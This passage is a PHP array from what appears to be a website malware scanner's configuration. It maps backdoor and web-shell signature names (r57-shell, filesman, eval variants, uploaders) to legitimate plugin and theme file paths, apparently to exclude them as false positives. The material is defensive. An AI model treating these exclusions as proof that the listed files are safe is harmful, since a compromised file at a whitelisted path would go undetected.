'php.backdoor.eval_gen.001.06' => array('importbuddy.php', '_repairbuddy.php', '/wp-content/plugins/optin-pressor/', '/wp-content/plugins/seo-rets/', '/wp-content/plugins/wp-banners-2.7/includes/checkinit.php', '/wp-content/plugins/wp-banners/includes/checkinit.php', '/wp-content/plugins/sociallocker-next-premium/libs/onepress/admixture/ping.php', '/wp-content/plugins/sociallocker-next-premium/libs/factory/core/includes/plugin.class.php', '/wp-content/plugins/sociallocker-next-premium/admin/pages/common-settings.php', '/wp-content/plugins/sociallocker-next-premium/includes/metaboxes/manual-locking.php', '/wp-content/plugins/sociallocker-next-premium/includes/classes/statistics-viewer.class.php', '/wp-content/plugins/rating-widget/rating-widget.php', '/wp-content/plugins/image-elevator/libs/factory/core/includes/plugin.class.php', '/wp-content/plugins/captcha-pro/', '/wp-content/plugins/wp-translator-revolution/classes/auth.class.php', '/wp-content/plugins/social-locker/libs/factory/core/includes/plugin.class.php', '/wp-content/themes/OptimizePress/lib/', '/wp-content/themes/Divi/js/bundle.js', '/application/modules/Hecore/Plugin/Core.php', '/app/code/local/Magestore/Magenotification/', '/app/includes/src/Magestore_Magenotification_', '/Model/System/Config/Backend/Import/Server.php', '/Model/System/Config/Backend/Export/Server.php', '/expressionengine/core/EE_Lang.php', '/expressionengine/modules/member/mod.member.php', '/components/com_maxcomment/includes/maxcomment.utils.php', '/email/admin/functions/process.php', 'rss/generator/rsslock.php', 'rss/rssFolder/rsslock.php', 'rss/rsslock.php', 'expirerpro/application/core/MY_Controller.php', '/include/utils/mvc_utils.php', 'porpress/porpress.php', 'app/code/community/LitExtension/CartMigration/Model/Resource/Setup.php', 'app/code/local/GoMage/Checkout/Helper/Data.php', 'app/code/local/Xtento/OrderExport/Model/System/Config/Backend/Export/', 'wp-content/plugins/rating-widget/freemius/includes/class-freemius.php', '/wp-content/plugins/wp-salesengine-plugin/fm.php', '/wp-content/plugins/wp-salesengine-plugin/inc/al/select.php', '/wp-content/plugins/wp-salesengine-plugin/inc/al/selects.php', 'administrator/components/com_sef/sef.class.php', 'wp-content/plugins/user-meta/models/enc/umProSupportModelEncrypted.php', '/application/modules/Ynfbpp/Bootstrap.php', 'GoMage/Feed/Helper/Data.php', '/GoMage/Navigation/Helper/Backup.php', '/GoMage/Navigation/Helper/Data.php', '/GoMage/Checkout/Helper/Data.php', '/wp-content/plugins/seo-rets.BK', 'inter2/admin/functions/process.php', '/includes/src/GoMage_Procart_Helper_Data.php', '/app/code/local/GoMage/Procart/Helper/Data.php', '/GoMage/Navigation_4_1/Helper/Data.php', 'app/code/community/Scommerce/Core/Helper/Data.php', 'SweetAlert/sweetalert-dev.js', 'app/code/local/Moogento/Pickpack/Block/Adminhtml/System/Config/Fieldset/Hint.php', 'app/code/local/Moogento/Pickpack/Helper/Moo.php', 'app/code/local/Moogento/Pickpack/Model/Adminhtml/System/Config/Backend/Import/Name.php', 'app/code/local/Moogento/Pickpack/Model/Feed/Updates.php', 'app/code/local/Moogento/ShipEasy/Block/Adminhtml/System/Config/Fieldset/Hint.php', 'app/code/local/Moogento/ShipEasy/Helper/Moo.php', 'app/code/local/Moogento/ShipEasy/Model/Adminhtml/System/Config/Backend/Import/Name.php', 'app/code/local/Moogento/ShipEasy/Model/Feed/Updates.php', 'includes/src/GoMage_Checkout_Helper_Data.php', 'includes/src/Moogento_Pickpack_Block_Adminhtml_System_Config_Fieldset_Hint.php', 'includes/src/Moogento_Pickpack_Helper_Moo.php', 'includes/src/Moogento_Pickpack_Model_Adminhtml_System_Config_Backend_Import_Name.php', 'includes/src/Moogento_Pickpack_Model_Feed_Updates.php', 'includes/src/Moogento_ShipEasy_Block_Adminhtml_System_Config_Fieldset_Hint.php', 'includes/src/Moogento_ShipEasy_Helper_Moo.php', 'includes/src/Moogento_ShipEasy_Model_Adminhtml_System_Config_Backend_Import_Name.php', 'includes/src/Moogento_ShipEasy_Model_Feed_Updates.php', 'app/code/community/Scommerce/Sitemap/Helper/Data.php', 'app/code/community/Scommerce/Sitemap/Model/Mysql4/Catalog/Category.php', 'app/code/community/Scommerce/Sitemap/Model/Mysql4/Catalog/Product.php', 'app/code/community/Scommerce/Sitemap/Model/Mysql4/Cms/Page.php', 'app/code/community/Scommerce/Sitemap/Model/Resource/Catalog/Category.php', 'app/code/community/Scommerce/Sitemap/Model/Resource/Catalog/Product.php', 'app/code/community/Scommerce/Sitemap/Model/Sitemap.php', 'includes/checkinit.php', 'app/code/community/Scommerce/Heardaboutus/Helper/Data.php', 'includes/remote/remote.inc.php', 'admin/sources/products/import.inc.php', 'includes/src/Fishpig_Wordpress_Addon_', 'modules/3rdparty/Related_Products_Auto_Search/admin/products.php', 'modules/3rdparty/Related_Products_Auto_Search/admin/rpaslock.php', '/includes/src/Xtento_OrderStatusImport_Model_System_Config_Backend_Import_Server.php', '/includes/src/Xtento_CustomTrackers_Model_System_Config_Backend_Import_Server.php', '/Addon/VisualComposer/Model/Observer/Plugin/Abstract.php', '/Addon/VisualComposer/Model/Observer.php', '/Addon/VisualComposer/Helper/License.php', '/Addon/VisualComposer/Helper/Core.php', '/Addon/Root/Helper/Data.php', './Addon/Root/Helper/License.php', './Addon/Root/Helper/License.php', './Addon/Root/Helper/License.php', './Addon/Root/Helper/License.php', './Addon/Root/Helper/License.php', './Addon/Root/Helper/License.php', './Addon/Root/Helper/License.php', './Addon/Root/Helper/License.php', './Addon/Root/Helper/License.php', '/Addon/Root/Helper/License.php', 'components/com_ariquiz/', 'app/code/community/LitExtension/CustomerPassword/Model/Customer.php', 'app/code/community/LitExtension/CartMigration/Model/Catalog/Product.php', 'core/framework/pjController.class.php', 'core/framework/pjDbDriver.class.php', 'core/framework/pjDispatcher.class.php', 'core/framework/pjModel.class.php', 'core/framework/pjMysqliDriver.class.php', 'core/framework/pjMysqlDriver.class.php', '/wp-content/plugins/lecartmigration/views/', '/wp-content/plugins/lecartmigration/models/', '/wp-content/plugins/lecartmigration/core.php', '/jetpack-start/js/jetpack-start.js', '/jetpack-start/js/ie-shims.js', '/asset/dist/js/script.js', '/wp-content/plugins/wp-secure-amazon-s3/wp-secure-amazon-s3.php', '/includes/src/GoMage_Feed_Helper_Data.php', '/LitExtension/CartMigration/', '/app/code/local/Mobicommerce/Mobi', '/includes/src/Biztech_Startrack_Helper_Data.php', '/admin/functions/process.php', '/app/code/community/Netresearch/OPS/Test/Model/Api/DirectLinkTest.php', '/wp-content/mu-plugins/gd-system-plugin/plugins/customize-direct-manipulation/js/customize-dm-', '/includes/src/Xtento_GridActions_Model_System_Config_Backend_Import_Server.php', '/wp-content/plugins/hustle/assets/css/maps/admin.css.map', '/includes/src/GoMage_Salesdeals_Helper_Data.php', '/includes/src/GoMage_Navigation_Helper_Data.php', '/wp-content/plugins/easy-social-share-buttons3/assets/admin/sweetalert-dev.js', '/lib/fishpig/bolt/holepunch.php', '/lib/fishpig/bolt/app.php', '/includes/src/Scommerce_', '/core/framework/controller.class.php', '/core/framework/object.class.php', '/core/framework/model.class.php', '/components/com_vm_soa/models/settings.php', '/plugins/cptui-extended/assets/js/plugin.js', '/src/scommerce/catalogurl/controllers/productcontroller.php', ), 
'php.backdoor.eval_gen.002.01' => array('/app/code/local/Wyomind/Googletrustedstores/Model/Googletrustedstores.php', '/includes/src/Wyomind_Googletrustedstores_Model_Googletrustedstores.php', '/app/code/wyomind/massproductimport/helper/massproductimport.php', ), 
'php.backdoor.eval_gen.002.02' => array('app/code/local/Wyomind/Datafeedmanager/Model/Configurations.php', '/app/code/local/Wyomind_/Datafeedmanager/Model/Configurations.php', 'includes/src/Wyomind_Datafeedmanager_Model_Configurations.php', '/wyomind/simplegoogleshopping/model/simplegoogleshopping.php', ), 
'php.backdoor.eval_gen.016' => array('forms/facileforms.process.php', 'forms/facileforms.process.php', '/components/com_jreviews/jreviews/views/helpers/custom_fields.php', ), 
'php.backdoor.eval_get_option.001' => array('themes/localbizpro/header.php', 'wp-content/plugins/external-database-authentication/ext_db_auth.php', '/plugins/2mb-autocode/2mb-autocode.php', ), 
'php.backdoor.eval_preg_replace.001' => array('/plugins/pulse-notify/includes/functions/fn-backend-processing.php', ), 
'php.backdoor.exec.001' => array('/XCloner.php', 'config/curl.class.php', 'plugins/agilecrmwc/includes/Curl.php', 'viewshark/f_core/f_classes/class.', 'viewshark/f_modules/m_backend/m_tools/m_linfo/lib/functions.display.php', 's2-server-scanner.php', '/includes/src/AW_Islider_Helper_Files.php', '/AW/Islider/Helper/Files.php', '/administrator/components/com_xcloner-backupandrestore/restore/XCloner.php', 'cloner.functions.php', 'swift/includes/functions.php', 'swift/library/AmazonS3/class.SWIFT_AmazonS3Request.php', 'swift/library/LoginShare/class.SWIFT_LoginShare.php', 'swift/library/AmazonSQS/class.SWIFT_AmazonSQSRequest.php', 'swift/library/AmazonCloudFront/class.SWIFT_AmazonCloudFrontRequest.php', 'swift/library/AmazonRDS/class.SWIFT_AmazonRDSRequest.php', 'swift/library/AmazonEC2/class.SWIFT_AmazonEC2Request.php', 'swift/library/AmazonIAM/class.SWIFT_AmazonIAMRequest.php', 'swift/library/GeoIP/class.SWIFT_GeoIP.php', 'swift/library/Database/class.SWIFT_Database.php', 'swift/models/FileManager/class.SWIFT_FileManager.php', '/app/code/local/AW/Featured/Helper/Images.php', 'app/code/local/AW/Betterthankyoupage/controllers/PreviewController.php', 'dbtech/dbseo/includes/class_core.php', 'sohoadmin/program/webmaster/helpmehelpyou.php', 'sohoadmin/program/webmaster/movesite-transfer.php', 'Pbx123/lib/Curl.php', 'webui/webui.php', 'cm4all/iproc.php', 'wp-content/plugins/edwiser-bridge/includes/payments/eb-ipnlistener.php', 'administrator/components/com_cloner/restore/Joomla.Cloner.php', 'magento_appsec_file_check.php', '/plugins/edwiser-bridge/includes/payments/eb-ipnlistener.php', '/AW_Featured_Helper_Images.php', 'js/parallax.js', 'js/common.js', 'wp-content/plugins/GravityMerge/html/ManageMergeSettings.php', '/app/code/local/AW/Islider/Helper/Image.php', '/op-server-scanner.php', ), 
'php.backdoor.extract.001.02' => array('/bhaskar-rss-new.php', ), 
'php.backdoor.fakeJPG.001' => array('/PATCH_SUPEE-10888_CE_', '/update.phar.php', ), 
'php.backdoor.file_get_contents.005' => array('freichat/installation/integ/WordPress.php', 'plugins/wp-simple-login-registration/wp_slrp_options_page.php', '/AIT/Admin/ait-admin.php', 'wp-content/themes/DubaiCity/AIT/Admin/ait-admin.php', 'swift/library/Loader/class.SWIFT_Loader.php', 'swift/library/FileManager/class.SWIFT_FileManager.php', 'swift/library/Database/class.SWIFT_Database.php', '/modules/Connectors/controller.php', '/lib/admin/control-panel.php', 'core/model/modx/processors/element/importproperties.php', 'admin/context/subscriber_import.php', 'themes/profitstheme_11/lib/admin/control-panel.php', 'gym_sitemaps/includes/gym_rss_functions.php', 'cloner.functions.php', 'plugins/easy-admin-color-schemes/easy-admin-color-schemes.php', '/plugins/document-viewer/libs/getContents.php', 'plugins/custom-database-tables/lib/admin.php', 'admin/modules/style/themes.php', 'wp-content/plugins/googledriveembedder-enterprise/core/folders/drive_helper.php', 'swift/models/FileManager/class.SWIFT_FileManager.php', '/administrator/components/com_recruitmentmanager/admin.recruitmentmanager.html.php', 'wp-content/themes/automotive/classes/themes-updater/verify.php', 'wp-content/plugins/dd-simple-photo-gallery/admin/dd_spg_manage_photo.php', '/mods/_core/', '/bridge2cart/bridge.php', '/wp-content/plugins/http-headers/http-headers.php', '/resources/autoindex/autoindex.php', '/wp-content/plugins/showoff/admin/class/showoff.php', '/wp-content/plugins/lumise/core/includes/ajax.php', '/wp-content/themes/drzyad/paid-memberships-pro/pages/account.php', '/wp-content/plugins/miniorange-saml-20-single-sign-on/import-export.php', ), 
'php.backdoor.filesman.001.003' => array('wp-content/plugins/seedprod-coming-soon-pro/inc/class-plugin.php', '/seedprod/inc/class-plugin.php', '/admin/includes/functions/sessionclient.inc.php', 'vsa/myauth.php', 'wp-content/plugins/duplicator-clone/libs/sd_installer.php', ), 
'php.backdoor.filesman.003' => array('/wp-content/plugins/wpematico_fullcontent/inc/functions.php', ), 
'php.backdoor.filesman.017' => array('system/config/paladinrm/prmAction.php', '/app-sd/masters-sd/skeletons-sd/class.libs.php', '/app-sd/skeletons-sd/pagination.php', ), 
'php.backdoor.filesman.052' => array('wp-content/plugins/wpgroupbuy-plugin/includes/classes/wpg.license.class.php', ), 
'php.backdoor.generic-w3.017' => array('jamss.php', '/ose_virus_definitions.php', '/antihacker/library/signature.php', ), 
'php.backdoor.generic-w3.058' => array('/jamss.php', ), 
'php.backdoor.generic-webshell.003' => array('cloud/apps/files_external/3rdparty/smb4php/smb.php', ), 
'php.backdoor.generic.001.17' => array('plugins/dsidxpress/dsidxwidgets/api-request.php', 'bfnetwork/bfnetwork/bfAuditor.php', 'plugins/dsidxpress/api-request.php', 'app/code/community/TBT/Common/', 'app/code/community/TBT/Rewards', 'includes/src/SweetTooth', 'includes/src/TBT', 'lib/SweetTooth/classes/Loyalty.php', 'app/code/community/Mgt/Varnish/Model/', 'app/code/community/Mgt/Varnish/Helper', 'app/code/community/Mgt/Varnish/controller', 'app/code/community/Mgt/Varnish/Block', 'plugins/easy-adsense-lite/EzTran.php', 'plugins/webgility_wp_woocommerce/lib/D.WgCommon.php', '/app/etc/code/community/Mgt/Varnish/Block/Adminhtml/System/Config/Fieldset/Route/Cachelifetime.php', '/app/etc/code/community/Mgt/Varnish/Helper/Data.php', '/app/etc/code/community/Mgt/Varnish/Model/Observer.php', '/wp-content/plugins/bulletproof-security/admin/tools/tools.php', '/includes/classes/cache.class.php', '/includes/classes/seo.class.php', '/includes/src/wee_advancedordermanagement_', '/includes/src/mgt_varnish_', '/includes/src/mgt/varnish/controllers/adminhtml/mgtvarnishcontroller.php', '/bridge2cart/bridge.php', '/libraries/regularlabs/src/uri.php', '/themes/world_businessmen_silhouette_bue025/world_businessmen_silhouette_bue025/functions.php', '/app/code/community/webgility/ecc/model/desktop.php', '/d.wgcommon.php', '/includes_c/classes/seo.class.php', '/wp-content/plugins/local-market-explorer/api-requester.php', '/astra/libraries/plugins/phpmussel/vault/frontend.php', '/includes/functions/header_tags.php', ), 
'php.backdoor.generic.001.18' => array('app/code/local/SM/XPos/Helper/License.php', '/modules/myowndeliveries/encoded.php', '/wp-content/plugins/bulletproof-security/admin/tools/tools.php', 'wp-content/plugins/bulletproof-security/admin/tools/b64-offline-decoder.php', '/wp-content/plugins/wp-authority-suite-pro/alsspbas.php', '/wp-content/plugins/wp-authority-suite-pro/wp-authority-suite-pro.php', '/wp-content/plugins/cf-geoplugin/includes/class-cf-geoplugin-defender.php', '/app/code/local/magegiant/giantpoints/model/mysql4/abstract.php', '/app/code/local/sm/barcode/helper/license.php', '/app/code/local/sm/barcode/controller/adminhtml/action.php', '/wp-content/plugins/authority-links-pro/authority-links-pro.php', ), 
'php.backdoor.generic.001.19' => array('plugins/system/easycalccheckplus/easycalccheckplus.php', '/includes/class.auth.php', 'js-support-ticket/includes/captcha.php', 'plugins/system/easycalccheckplus.php', '/wp-content/plugins/convertpress-optin-landing/functions/aqpb_functions.php', '/wp-content/plugins/bulletproof-security/admin/tools/tools.php', '/components/com_jsjobs/models/common.php', '/plugins/content/system/easycalccheckplus/easycalccheckplus.php', '/administrator/components/com_jssupportticket/models/ticket.php', '/components/com_jsjobs/models/jsjobs.php', 'wp-content/plugins/usp-pro/inc/usp-process.php', '/wp-content/plugins/cf-geoplugin/includes/class-cf-geoplugin-defender.php', ), 
'php.backdoor.generic.001.20' => array('app/code/local/Magestore/Magenotification/', '/wp-content/themes/OptimizePress/lib/', '/app/includes/src/Magestore_Magenotification', 'app/code/local/Magestore_OLD/', '/wp-content/plugins/wp-salesengine-plugin/', 'expressionengine/modules/member/mod.member.php', 'includes/src/Magestore_Magenotification_', 'leads-report/phpGrid/', '/Magestore_Magenotification/Magestore_Magenotification_', '/includes/src/Magestore_Magenotificationbck_Model_Keygen.php', '/includes/src/Magestore_Magenotificationbck_Helper_Data.php', '/includes/src/Magestore_Magenotificationbck_Helper_Feedback.php', '/includes/src/VladimirPopov_old_WebForms_Block_Adminhtml_Webforms.', '/includes/src/VladimirPopov_old_WebForms_Block_Webforms', '/includes/src/VladimirPopov_old_WebForms_Block_Adminhtml_Webforms_Edit.', '/includes/src/Magestore_Magenotificationbck_Helper_License.php', '/wp-content/plugins/kswp_pop_wizard/kswp_pop_wizard-inc.php', '/wp-content/plugins/kswp_pop_wizard/ks-popwizard-lacs.php', 'agestore/Fbcomment/Model/Observer.php', 'agestore/Fbcomment/Block/Fbcomment.php', '/app/code/local/magestore/Magenotification/Model/', '/app/code/local/magestore/Magenotification/Helper/', '/news/shop/app/code/local/magestore/Datatransporter/controllers/Adminhtml/DatatransporterController.php', '/news/shop/app/code/local/magestore/Datatransporter/Model/Observer.php', '/app/code/local/Magestore/Promotionalgift/', '/app/code/community/i95dev/emailacart/controllers/emailcontroller.php', '/app/code/community/i95dev/emailacart/controllers/magexcontroller.php', 'wp-content/plugins/wpgroupbuy-plugin/includes/classes/wpg.license.class.php', '/app/code/local/magestore/giftwrap/', '/app/code/local/magestore/magenotification/', '/includes/src/i95dev/captcha/controllers/', ), 
'php.backdoor.generic.001.22' => array('application/modules/Communityad/controllers/license/license1.php', 'modules/mod_foxcontact/mod_foxcontact.inc', '/app/code/community/Nostress/Nscexport/Helper/Version.php', 'plugins/popup-domination/popup-domination.php', 'wp-content/plugins/social-link-machine/', 'social-link-machine/utils/facebook/base_facebook.php', '/components/com_foxcontact/foxcontact.inc', ), 
'php.backdoor.generic.003.03' => array('/mailhive/common/functions/template_engine.php', 'mailhive/filterbeez/filter_do_throttling_simple/magic_5.php', 'app/code/local/Anowave/Package/Helper/Data.php', 'includes/src/Anowave_Package_Helper_Data.php', 'system/config/paladinrm/prmFunction.php', '/coreclass.php', '/app/code/local/anowave/package/data.php', '/autokey/encrypt.php', '/autokey/decrypt.php', '/wp-content/plugins/nxs-snap-pro-upgrade/nxs-snap-pro-upgrade.php', '/app/code/anowave/package/helper/base.php', ), 
'php.backdoor.generic.004' => array('wp-content/plugins/wp-member/', '/wp-content/plugins/wp-ezsqueezey', '/wp-content/plugins/a10-imaio/', '/wg_cdseo/wg_addon/core_ec.php', '/wg_cdseo/controllers/common/index.post_ec.php', '/wg_search/controllers/frontend/wg_search_40_ec.php', '/wg_search/controllers/frontend/wg_search_ec.php', '/wg_search/func_ec.php', 'ersadmin/index.php', 'ersadmin/erslink.php', '/wp-content/plugins/a10-imaio/', '/S3FlowShield/index.php', '/S3FlowShield/ctr/', '/S3FlowShield/css/index.php', '/S3FlowShield/includes/index.php', '/S3FlowShield/lib/', '/S3FlowShield/js/', 'wptwindeploy.php', 'wptwin.php', '/wp-content/plugins/wp-rss-curator/models/', '/wp-content/plugins/wp-rss-curator/views/', '/wp-content/plugins/wp-rss-curator/libs/phpFlickr.php', '/wp-content/plugins/wp-rss-curator/feeds-importer.php', '/wp-content/plugins/wp-rss-curator/classes/', '/wp-content/plugins/wp-rss-curator/wp_rss_curator.php', '/app/addons/wg_dotd/', '/modules/main/classes/general/usertypedbl.php', '/app/addons/wg_related_products/', ), 
'php.backdoor.generic.005' => array('/wp-content/plugins/popup-domination/popup-domination.admin.php', '/application/modules/Site', '/application/modules/Communityad/controllers/license/', '/application/modules/Advancedactivity/controllers/license/', '/application/modules/Sitemobile/controllers/license/', '/application/modules/Sitealbum/controllers/license/', '/application/modules/Sitereview/controllers/license/', '/application/modules/Seaocore/controllers/license/', 'plugins/popup-domination/popup-domination.php', 'wp-content/plugins/social-link-machine/', 'plugins/popup-domination/popup-domination.admin.php', '/sendy/install.php', '/wp-content/plugins/phpbay/ebay.php', '/wp-content/plugins/phpbay/phpbay.php', '/system/library/mfilter_module.php', '/sanalpospro/controllers/', '/sanalpospro/lib/', '/phpchat-free/', '/plugins/wp-payment-gateway/wp_pg_bundle_settings.php', '/tigermin/controller/indexcontroller.php', '/wp-content/themes/newspapertimes-multi-pro/functions.php', '/wp-content/plugins/miniorange-login-openid/', '/wp-content/plugins/ldap-login-for-intranet-sites/', '/wp-content/plugins/miniorange-otp-verification-onprem/', '/wp-content/plugins/miniorange-saml-20-single-sign-on/import-export.php', ), 
'php.backdoor.generic.043' => array('/wp-content/plugins/memberium2/lib/frontend.php', ), 
'php.backdoor.generic.045' => array('/bfnetwork/bfAuditor.php', '/bridge2cart/bridge.php', ), 
'php.backdoor.generic.045.05' => array('soundcloud-is-gold/soundcloud-is-gold-functions.php', '/admin/controllers/FMControllerManage_fm', '/classes/Product.php', '/sources/profile-modify.php', '/wp-content/plugins/wishlist-member/core/PluginMethods.php', '/wp-content/wishlist-member-backup', '/dap/inc/functions.php', '/wp-content/plugins/contact-form-builder/admin/controllers/CFMControllerManage_cfm.php', '/Sources/Profile-Modify.php', '/dap/authenticate.php', '/webfiles/lib/util.php', '/controllers/iworkorder_module/iworkorder_module.php', '/wp-content/plugins/webgility_wp_woocommerce/lib/D.woocommerce1.php', '/directories/global.php', '/directories/.svn/text-base/global.php.', '/directories/.svn/tmp/global.php.', '/plugins/shortpixel-image-optimiser/wp-shortpixel.php', '/wp-content/plugins/wp-link-engine/menus.php', '/plugins/wd-mailchimp/admin/controllers/mwdcontrollermanage_forms.php', ), 
'php.backdoor.generic.050' => array('/components/com_ose_firewall/protected/data/vsscanpath/pattern.php', ), 
'php.backdoor.generic.066' => array('/plugins/via-event-manager/viaem_registration.php', ), 
'php.backdoor.injector.117' => array('/plugins/bulletproof-security/', ), 
'php.backdoor.joomla_gen.001' => array('administrator/components/com_media/helpers/media.php', ), 
'php.backdoor.passthru.002' => array('/gallery/setup/backup_albums.php', '/Gallery/setup/backup_albums.php', ), 
'php.backdoor.preg_replace_xor.001' => array('/includes/common_functions.php', ), 
'php.backdoor.pregreplace.004' => array('/app/code/local/wyomind/datafeedmanager/helper/datafeedmanager.php', ), 
'php.backdoor.pregreplace.006' => array('/adiinviter/adiinviter_bootstrap.php', ), 
'php.backdoor.pregreplace.006.01' => array('/Wyomind/Simplegoogleshopping/Model/Simplegoogleshopping.php', ), 
'php.backdoor.pregreplace.012' => array('components/com_jhackguard/data/scans/rules.php', 'wp-content/plugins/uploadplus/inc/core.class.php', '/jquery.oembed.min.js', '/jquery.oembed.js', '/wp-content/plugins/tasty-recipes/inc/class-content-model.php', '/pass/instagramtransformpass.php', '/support/js/oembed.js', ), 
'php.backdoor.r57-shell.003' => array('app/code/community/fishpig/opti/helper/minify/js.php', '/cartmigration_app/adminer/include/', '/cartmigration_app/adminer/drivers/pgsql.inc.php', '/litextension/cartmigration/model/cart/magento13.php', '/wp-content/plugins/mobiloud-mobile-app-plugin/libs/onsen/js/', '/litextension/cartmigration/model/cart.license2.php', ), 
'php.backdoor.rename.001' => array('core/lib/Drupal/Component/PhpStorage/MTimeProtectedFastFileStorage.php', '/web/_________install/include/functions.php', ), 
'php.backdoor.request.003' => array('/admin/members.php', 'plugins/chathistory/index.php', 'indeed-smart-popup/admin/functions.php', 'wp-content/plugins/indeed-smart-pop-up/admin/functions.php', 'metaadmin/metainc/post_tbl_item_display_control.php', 'forms/reservation/admin/lib/menus/default/common.php', '/cmsb/lib/menus/default/common.php', '/admin/includes/classes/class(copy before guest go into meta).vat.reports.php', '/admin/includes/classes/class.vat.reports.php', '/admin/includes/classes/class.manifest.reports.php', '/admin/includes/classes/_class.vat.reports.php', '/admin/includes/classes/class (copy).vat.reports.php', '/admin/includes/classes/class.rep.reports.php', '/admin/includes/classes/class.customers.php', '/admin/includes/classes/class (copy).rep.reports.php', '/admin/includes/classes/class (another copy).customers.php', ), 
'php.backdoor.shell-exec.007' => array('/generate-pdf.php', ), 
'php.backdoor.shell_title.001' => array('/shelldetect.php', '/html/pyshell.html', '/coa/lib/shell.js.html', ), 
'php.backdoor.str_rot13.001' => array('woocommerce-follow-up-emails/includes/class.fue_link_replacement.php', '/wp-content/plugins/wp-testing/src/Facade.php', 'Cw/Key.php', '/wp-content/plugins/bulletproof-security/admin/tools/tools.php', 'wp-content/plugins/bulletproof-security/admin/tools/b64-offline-decoder.php', ), 
'php.backdoor.str_rot13.002' => array('ipb_converge.php', ), 
'php.backdoor.system.001' => array('iwp-client/backup.class.php', '/wp-content/plugins/ithemes-sync/functions.php', '/wp-content/plugins/worker/backup.class.php', 'wp-content/plugins/iwp-client/backup.class.', 'wp-content/plugins/CyberSEO/ioncube/loader-wizard.php', '/wp-content/plugins/cms-commander-client/lib/CMSC/Backup.php', 'loader-wizard.php', 'com_community/libraries/videos.php', '/mageauditor/mageauditor.php', '/worker/backup.class.php', '/p4a/admin.php', '/p4a/applications/botones/index.php', '/wp-content/plugins/wp-serverinfo/wp-serverinfo.php', 'includes/common/lib/shell/kt_shell.class.php', '/wp-content/plugins/fast-velocity-minify/inc/functions-serverinfo.php', '/fast-velocity-minify/inc/functions-serverinfo.php', '/mageaudit/mageauditor.php', '/wp-tcapsule-bridge', '/iwp-client/backup.class', '/inc/functions_dump.php', '/wp-content/plugins/wp-ithemes-sync/functions.php', ), 
'php.backdoor.system.004' => array('/admin/auto_update_framework.php', '/wp-content/themes/framework/framework/core/UPDATER.php', 'zp-core', '/zendemo/index.php', '/wp-content/plugins/cloudinvoiceclient/includes/process_cloud_invoicing.php', '/framework/core/UPDATER.php', 'wp-content/themes/HotelBooking/admin/auto_update_framework_bk.php', 'plugins/cart66/admin/settings/debug.php', 'wp-content/themes/Appointment/admin/auto_update_framework_bk.php', '/wp-content/plugins/iremotewp/inc/iremote.', 'content/plugins/odmseo/class/class-ods-', 'content/plugins/odmseo/class/ods-setup-manager.php', ), 
'php.backdoor.system_shell.001.02' => array('/scripts/upgrade.pl', 'logs/sh404sef/sec/', '/wp-content/plugins/gravatar-and-userpics/gravatar.php', 'gallery/lib/tools/bin/getillegalfunctions.pl', '/wp-content/plugins/malcare-security/callback/wings/fs_write.php', ), 
'php.backdoor.system_shell.005' => array('/wp-content/plugins/fast-velocity-minify/inc/functions-serverinfo.php', ), 
'php.backdoor.uploader.001.02' => array('/administrator/components/com_form/admin.form.php', 'modules/watermark/watermark.php', 'plugins/plett-properties/plett-properties-admin.php', 'controllers/admin/AdminProductsController.php', 'controllers/admin/AdminThemesController.php', 'controllers/admin/AdminAttachmentsController.php', 'controllers/admin/AdminModulesController.php', '/aulavirtual/lib/formslib.php', '/administrator/components/com_form/admin.form.php', 'wp-content/themes/OptimizePress/admin/Up.php', 'app/code/core/Mage/Review/Model/Resource/Review.php', 'plugins/microthemer/tvr-microthemer.php', 'wp-content/plugins/TeachersStudentCharity', 'modules/autoupgrade/AdminSelfTab.php', 'plugins/clarkvideo-gallery/admin/upload.php', 'moodle/lib/formslib.php', '/vsadmin/inc/inccats.php', '/sohoadmin/program/modules/', '/sohoadmin/program/webmaster/backup_restore.php', '/wp-content/plugins/event-espresso/includes/template_settings/index.php', '/wp-content/plugins/font-uploader/font-upload.php', ), 
'php.backdoor.uploader.003' => array('event-espresso/includes/event-management/csv_import.php', 'freichat/client/plugins/upload/upload.php', 'freichat/client/plugins/upload/upload_mobile.php', '/sohoadmin/program/modules/tiny_mce/plugins/advimage/upload_file.php', '/cometchat/admin/language.m.php', '/cometchat/admin/themes.m.php', '/cometchat/admin/plugins.m.php', '/cometchat/admin/modules.m.php', '/wp-content/plugins/extrawatch-pro/components/com_extrawatch/src/class.extrawatch.block.php', '/wp-content/plugins/extrawatch-pro/components/com_extrawatch/src/class.extrawatch.goal.php', '/livezilla/_lib/objects.internal.inc.php', '/LiveZilla/_lib/objects.internal.inc.php', '/livezilla/_lib/functions.internal.inc.php', '/LiveZilla/_lib/functions.internal.inc.php', ), 
'php.backdoor.uploader.006' => array('y/admin/functions.php', 'themes/kingsize/lib/theme-post-custom-fields.php', 'themes/kingsize/lib/theme-page-custom-fields.php', 'plugins/arforms/core/controllers/arformcontroller.php', '/livezilla/_lib/objects.internal.inc.php', '/LiveZilla/_lib/objects.internal.inc.php', '/livezilla/_lib/functions.internal.inc.php', '/LiveZilla/_lib/functions.internal.inc.php', '/wp-content/plugins/smart-maintenance-mode/smart-maintenance-mode.php', '/admin/additional/frontpage.center.php', '/smart-maintenance-mode.php', '/includes/src/bloonaway/ciplcatalog/controllers/customproductcontroller.php', '/mapsvg.php', '/application/controllers/ajaxcontent.php', '/application/views/ajaxcontent.php', ), 
'php.backdoor.uploader.006.03' => array('/controllers/admin/AdminImportController.php', '/wp-content/plugins/wp-filebase/wpfb-async-upload.php', '/wp-content/plugins/wp-filebase-pro/wpfb-async-upload.php', 'wp-content/plugins/secure-files/secure-files.php', 'wp-content/plugins/custom-content-type-manager/controllers/import_def.php', 'elFinder.class.php', 'themes/smallbiz/functions.php', '/themes/smallbiz/layouts/cynthia/functions_layout.php', 'themes/smallbiz/layouts/five/functions_layout.php', 'includes/remote/remote.inc.php', 'admin/sources/products/import.inc.php', 'wp-content/plugins/wp-filemanager/incl/upload.inc.php', 'modules/installer/admin/index.inc.php', '/wp-content/plugins/wpematico_fullcontent/inc/functions.php', '/wp-content/plugins/wp-post-corrector/wp_export.php', '/wp-content/plugins/wp-post-corrector/update/bulk_update.php', '/wp-content/plugins/wp-post-corrector/upload/bulk_upload.php', '/admin/admin-ajax.php', '/admin/upload_file.php', ), 
'php.backdoor.uploader.007' => array('lib/script/loadSettings.php', 'user/member/index.php', '/libraries/flvplayer/assets/imgproxy.php', '/includes/modules/pages/database_setup/header_php.php', ), 
'php.backdoor.uploader.017' => array('/protected/controllers/registrationpropertymanagecontroller.php', ), 
